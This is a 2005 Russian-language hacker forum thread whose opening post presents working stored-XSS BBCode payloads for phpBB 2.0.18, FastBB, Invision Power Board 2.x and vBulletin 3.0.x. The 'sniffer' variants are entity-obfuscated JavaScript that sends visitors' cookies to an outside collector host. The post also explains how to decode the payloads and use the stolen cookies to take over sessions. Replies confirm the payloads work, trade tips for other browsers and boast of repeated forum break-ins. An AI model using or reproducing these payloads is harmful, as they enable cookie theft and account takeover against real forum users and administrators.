Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet.

Discussion in 'Уязвимости' started by queen, 8 Nov 2005.

  1. queen

    queen Banned

    Joined:
    3 Nov 2005
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.


    Ny potratil nesoliko secund, koroche
    lovite kod alerta:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]
    Kod Sniffera:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
    Yberite znaki "+" V SPEZIUALINIUH simvolah!

    http://webmastertools.narod.ru/OnlineTools/url_decode.html

    Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati.



    Sniffak delaetsya ispolizyya ety ssiulky:

    http://www.h4cky0u.org/encrypt/index.php

    Ny i komy interesno, chitaite ety statiiu dlya profilaktiki

    http://forum.antichat.ru/thread10119.html


    Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata.

    Alert.

    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]
    
    Sniffer:

    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]
    Ne znaiu kak tam v fastbb rabotaet avtorizaziuya ne smotrel, no esli chto, to mozhno vsegda Adminy pomenyati
    paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo.


    Viuschla novaya versiya IPB 2.1.3

    I lomaetsya eta versiya vot tak:

    (Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )



    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javaSCrip	t:alert(/wj/))`

    Kyki voryem vot tak:

    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`


    Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7)

    Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal.

    Sniffer.

    HTML:
    [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL]



    Kstati, eto yzhe k wapbbs.


    Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. )


    A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool



    White Jordan.
     
    #1 queen, 8 Nov 2005
    Last edited: 8 Nov 2005
    1 person likes this.
  2. Mina

    Mina New Member

    Joined:
    13 Oct 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Отлично! А это работает на Vbuletin 350?
     
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    слухай queen
    а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом
    ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему.
     
    1 person likes this.
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
     
  5. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    в Ipb 2.0.4 всё проходит , просто супер.
     
  6. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
    xss и СИ он знал отлично.
    а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
    но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.
     
  7. Net_Gear

    Net_Gear Banned

    Joined:
    8 Nov 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    + уберать надо.
     
  8. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    WJ Конечно молодец не чё не скажешь!
    Но все его XSS коды работают тока в IE.
    Но ведь есть FireFoX Opera/
    Коды в студию =)
     
  9. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4

    нет лол конечно можно сделать так, чтобы работало и в Опере и в Фаерфоксе, но просто как то саму разумеется выкладывается для Ие, а потом читатель дописывает код для той версии браузера, которая ему нужна. Ты вообще знаешь СКОЛЬКО в мире разных браузеров??? Не могу же Я дописывать для каждого браузера коды! Это просто дело времени да и не нужно.

    Есть много способов сделать чтобы коды работали в фаерфоксе кстати. Одна из них, эот использовать функцию onmouseover=alert(/wj/)
    ну и размер увеличить до такой велечены, чтобы хочешь не хочешь а хер....да много способов есть!

    Сам фаерфокс и опера, имеют меньше возможностей чем ИЕ это раз, так что Javascript без тегов и многое другое, не работает ни в фаерфоксе ни в опере.

    ИЕ это вообще самый лучшый браузер в мире, но он менее из-за этого защищён.

    Я та тут причём
     
  10. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Я себя никогда не прятал. Что значит Я выдал себя? Я сам не знаю почему не банят, и сам не знаю за что банят.
     
  11. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Ха как интересно, просто столько слухов шло, что коды в статье не работали, проверив, Я нашёл что они и действительно не работают.

    Хер знает почему, но видео которое Я снял, короче туда Я поместил уже рабочий код. Это видео будет ещё несколько дней там висеть потом оно само сотрётся.

    А вообще хорошо, что в статье код не работает даже когда плюсики убераешь.... ломать не будут.
     
  12. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    мх, да нет, всё работает вродебы...+document.cookie не забудьте правильно написать и тогда всё работает.
     
  13. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    хм... специальными символами здесь будут только " (& + # 3 4 ; )? т.е. + убирается только в них?
     
  14. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Подскажите, а что нам даёт код алерта?
     
  15. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Да.


    NeMiNeM,

    Показывает что всё работает. Если есть алёрт, будет всё остальное. И сниффер, и любой другой язык Javascript`а если сумеешь правильно всё написать.
     
  16. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    Все прекрасно работает. Огромнейшее спасибо автору. Однако хотелось бы выяснить, есть ли подобные XSS для vb 3.5.x?
     
  17. Paralitik

    Paralitik Banned

    Joined:
    15 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0

    Ну у меня конечно есть.

    А в публику это Я выкладывать не хочу, так как это самый защищённый форум на сегодняшний день, (Я проверил) и хотелось бы на всякий пожарный, уметь его иметь. +)


    NeMiNeM,

    Сонный был, чуток не правильно сказал прочёл так сам засмеялся лол...


    Алёрт показывает что всё работает. Если есть алёрт, будет всё остальное, и сниффер, и любая другая функция Javascript`а если с умеешь правильно всё написать обойдя все фильтры.

    Вот так надо. +)
     
  18. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Что именно работает-то ?

    2WJ
    Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.
     
  19. Бафун

    Бафун Banned

    Joined:
    19 Nov 2005
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Ну не то, что все баги которые Я нахожу, уже нашёл античат....просто так скажу, 90% процентов, Я научился именно от тебя и zFailure`a. Больше всего от тебя. Это насчёт того, что с помощью тегов можно провести XSS атаку, засунув один тег в другой сам метод техники т.д. Вообще-то, если бы именно не ты, именно ты, то никто бы ничего не античате не знал так хорошо, как он знает, потому что ты был во многом первым и открыл море идей для других включая меня.

    Теперь, многие твои идеи Я уже улучшил и постоянно улучшаю.

    К примеру, уже спаренные теги,
    HTML:
    [COLOR=[IMG]http://www.wj.gif[/IMG]]wj[/COLOR]
    которые ты придумал или вложенные теги один в другой,

    HTML:
    [email][email protected][url]http://www.wj.com[/url][/email]
    которые ты тоже придумал, уже для нашего времени - старьё. )
    Я теперь использую тройные, а часто четверные комбинации тегов. Вот это уже извини подвинься, придумал именно Я. =)

    Соглашаюсь, что до тебя всё, что почти все люди знали во всём мире, так это использовать одну из функций как
    увеличив буквы на всю страницу. Пришёл ты, и нашёл что в IE есть
    и существует третья, рабочая кавычка.
    Это всё работает только в браузере Микрасофта. (ИЕ)

    По всем доказательствам ты был первым, который это всё нашёл хотя не спорю, что это могли знать и другие люди, и ты мог быть не первым....ну во всяком случаи ты был первым, который вывел мир из тьмы незнания. )

    Опять таки Я взял всю эту информацию и усовершенствовал её. Я теперь могу воровать куки во всех браузерах и делать это так, чтобы человек этого не заметил. Вот это тоже нашёл Я.

    Античат был базой и есть база, вот так скажу........античатовская школа, инфлуировала много-численное количество людей. Но никто не стоит на месте. :cool:
     
    #19 Бафун, 22 Nov 2005
    Last edited: 22 Nov 2005
  20. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Джордан, а твой способ будет совершенно бесполезен если админ просто-напросто не поставит галочку "запомнить" при входе...На сниффер придут куки без хэша. Только сессия и id юзера.